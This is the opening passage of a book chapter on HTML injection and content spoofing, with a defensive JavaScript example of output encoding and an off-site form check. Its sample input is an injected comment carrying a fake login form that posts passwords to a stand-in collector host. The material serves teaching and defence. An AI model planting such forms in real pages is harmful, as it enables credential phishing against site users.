5 HTML INJECTION AND CONTENT SPOOFING


Hypertext Markup Language (HTML) injection and content spoofing are attacks that allow a malicious user to inject content into a site’s web pages. The attacker can inject HTML elements of their own design, most commonly as a <form> tag that mimics a legitimate login screen in order to trick targets into submitting sensitive information to a malicious site. Because these types of attacks rely on fooling targets (a practice sometimes called social engineering), bug bounty programs view content spoofing and HTML injection as less severe than other vulnerabilities covered in this book.
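The injection described above, seen from the defender's side, as an added example that is not from the book: the same template rendered with and without output encoding, plus a coarse review check that lists `<form>` tags posting to another origin. All function names, the origins `shop.example` and `collector.example`, and the sample comment are constructed assumptions.

```javascript
// Added example: names, markup and URLs are constructed for illustration.
const SITE_ORIGIN = "https://shop.example";

// Encode the five characters that let text break out into markup.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: user-controlled text is concatenated straight into the page.
function renderCommentUnsafe(comment) {
  return `<div class="comment">${comment}</div>`;
}

// Hardened: the same template with output encoding applied.
function renderCommentSafe(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}

// Review check: list <form> tags whose action resolves to another origin.
// A regex scan is a coarse audit aid, not a full HTML parser.
function findOffsiteForms(html, origin = SITE_ORIGIN) {
  const hits = [];
  for (const [tag] of html.matchAll(/<form\b[^>]*>/gi)) {
    const m = /\baction\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(tag);
    const action = m ? (m[1] ?? m[2] ?? m[3]) : "";
    let target = "invalid";
    try { target = new URL(action, origin + "/").origin; } catch { /* keep "invalid" */ }
    if (target !== origin) hits.push({ tag, target });
  }
  return hits;
}

// Constructed input: a comment carrying a look-alike login form.
const sample =
  'Nice post!<form action="https://collector.example/login" method="post">' +
  'Password: <input type="password" name="pw"><input type="submit"></form>';

function demo() {
  return {
    unsafe: findOffsiteForms(renderCommentUnsafe(sample)),
    safe: findOffsiteForms(renderCommentSafe(sample)),
    encoded: renderCommentSafe("<form>"),
  };
}
```

With encoding applied, the browser displays the submitted markup as text instead of rendering a form, so the check finds nothing to flag in the hardened output.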

An HTML injection vulnerability ...
